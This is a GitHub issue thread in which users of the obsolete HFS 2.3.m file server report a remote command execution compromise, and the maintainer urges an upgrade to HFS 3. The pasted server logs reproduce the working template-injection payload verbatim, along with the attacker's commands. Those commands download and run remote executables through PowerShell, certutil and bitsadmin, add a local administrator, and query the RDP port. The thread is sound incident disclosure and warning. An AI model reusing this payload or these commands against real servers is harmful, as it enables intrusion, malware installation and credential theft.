HFS 2.3.m Hack - Remote Command Execution

[Ptit-Philou]

My HFS file server (W10) has just been hacked : it's time to update, don't use old versions anymore !

This is some informations for administrators. The hack looks like this one : https://github.com/rapid7/metasploit-framework/pull/19240 (not https://www.exploit-db.com/exploits/49584 )

I noticed strange commands in HFS logs, that look like remote commands in Search box.

• The hacker downloaded some programs and executed them : Crash.exe WindowsWatcher.key Roboform.dll
• I searched in Windows Event logs (System) : Service Control Manager indicated the creation of Cpprintsrv service in hidden folder. C:\ProgramData\Microsoft\CrashPrintf\Crash.exe
• The hacker also read the port number for Terminal Server, but it's not the same in router, fortunately...
• After that hfs.exe was deleted and I realised something was wrong, so I found logs.
• IP addresses change often and may be located in Asia, like used name (WanLiChangChengWanLiChang) : 146.70.200.117 164.90.160.59 165.227.68.140 3.38.212.132 104.28.158.204 103.119.15.175 43.205.207.16 103.119.15.175 61.52.169.128 104.28.153.15 104.28.158.204

HFS Logs : 09/06/2024 11:20:44 146.70.200.117 44116 Connected 09/06/2024 11:20:44 146.70.200.117 44116 Requested GET /?n=> &cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESUTLT:{.?n.}{.^abc.}===={.?n.} 09/06/2024 18:14:17 164.90.160.59 59642 Requested GET /?n=> &cmd=nslookup+cpit4a9no3sf3j5nia3gjkq7s6mq4anoy.oast.online&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 08:06:56 165.227.68.140 60692 Connected 11/06/2024 08:06:56 165.227.68.140 60692 Requested GET /?n=> &cmd=cmd+/c+echo 505227774 > C:/Users/Public/Downloads/0&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.} 11/06/2024 08:06:58 165.227.68.140 60694 Connected 11/06/2024 08:07:11 165.227.68.140 60694 Requested GET /?n=> &cmd=cmd+/c+powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://dpp-s3-data.s3.amazonaws.com/tpPNDWqMh5ubw','C:/Users/Public/Downloads/1.exe')&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}

11/06/2024 16:46:20 104.28.158.204 62279 Requested GET /?n=> &cmd=RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 16:46:20 104.28.153.15 14204 Requested GET /?n=> &cmd=certutil+-urlcache+-split+-f+http://39.101.122.168:889/RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 16:51:02 61.52.169.128 59799 Requested GET /?n=> &cmd=ipconfig&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:49:18 103.119.15.175 47684 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 17:49:18 103.119.15.175 47690 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//85.209.133.45%3A7598/dong.exe%27%29%29%22%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 17:53:25 43.205.207.16 60144 Requested GET /?n=> &cmd=ipconfig+/all&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:55:36 103.119.15.175 52008 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 17:55:36 103.119.15.175 52010 Requested GET /?n=%0A&cmd=bitsadmin.exe%20/transfer%20%22DownloadFile%22%20http%3A//85.209.133.45%3A7598/dong.exe%20%22%25CD%25%5Cdong.exe%22%20%26%26%20dong.exe&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 18:28:56 103.119.15.175 56406 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 18:28:56 103.119.15.175 56414 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//120.131.13.101%3A8080/index.php%27%29%29%22&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:37:49 103.119.15.175 47594 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 20:37:49 103.119.15.175 47606 Requested GET /?n=%0A&cmd=net%20localgroup%20Administrators%20wlccwlc%20/add&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:47:31 103.119.15.175 39702 Requested GET /?n=%0A&cmd=REG%20query%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%20Server%5CWinStations%5CRDP-Tcp%20/v%20PortNumber&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 20:57:17 103.119.15.175 34474 Connected 11/06/2024 20:57:17 103.119.15.175 34474 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 23:15:49 3.38.212.132 52953 Requested GET /?n=>&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} 11/06/2024 23:16:04 3.38.212.132 52955 Requested GET /?n=>&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

[rejetto]

that's right. people who didn't disable automatic check for updates, must have got this warning several days ago

as that front-page of this repo says, this project is obsolete and i'm not working on it anymore. i cannot exclude you may find a fix from some fork.

my suggestion is to use HFS 3 https://github.com/rejetto/hfs

[Ptit-Philou]

Thank you for feedback : Updated to HFS 3 :-) Great job ;-)

[DRSDavidSoft]

@Ptit-Philou Great write up; I wish I was notified of this attack sooner. According to @mohemiv, this issue was first reported to @rejetto in 18/08/2023 and the PoC was released in 25/05/2024

Guess what? I was happily running and using HFS 2 on my servers during these dates! A quick check of the Windows Defender logs (also known as Security Essentials) shows that the 1.exe file, RR.exe file, Crash.exe all were downloaded on these servers and only some were detected and blocked by Windows Defender.

That nasty Roboform.dll is a malicious Keylogger and Clipboard monitor in fact that has been collecting ALL secret tokens, passwords, cookies, etc on the Server for the past couple of weeks. Sheesh! 😭

@mohemiv next time please ALSO LET ME KNOW too. (I'm joking of course) but this is really pissing me off! @rejetto Thank you for the great software. It's my bad for not using HFS 3 instead of HFS 2, but I wish you had implemented a self destruct for HFS 2 instead of the warning message, or at least made the update disable the template processing/search functionality or something like that.

Now let's everyone move onto HFS 3, and R.I.P to HFS 2.

[Ptit-Philou]

Yeah, move to HFS3 and thank you for feedback ;-)

[rejetto]

i don't think it's ok to make "selfdestructing" software (or similar), but I guess AFTER the damage a lot of people would accept that, when it's too late. The POC i was given at the time was not working on 2.4, so i was not very worried. I discovered the other POC only when it was too late.

[Ptit-Philou]

A strange point : during hack on my server, hfs.exe has been deleted, maybe by hacker ? It helped me to react, as I was unabled to share files and I didn't pay attention to logs.... Installer should be removed or modified, to tell users that security is compromised

[DRSDavidSoft]

@Ptit-Philou Sure, it was also the initial reason that I found this out: #43 I also agree that it might have been the attackers themselves that removed HFS, maybe to prevent other attackers from connecting to the same compromised machine. Thank goodness that they did, otherwise I also wouldn't have found it out!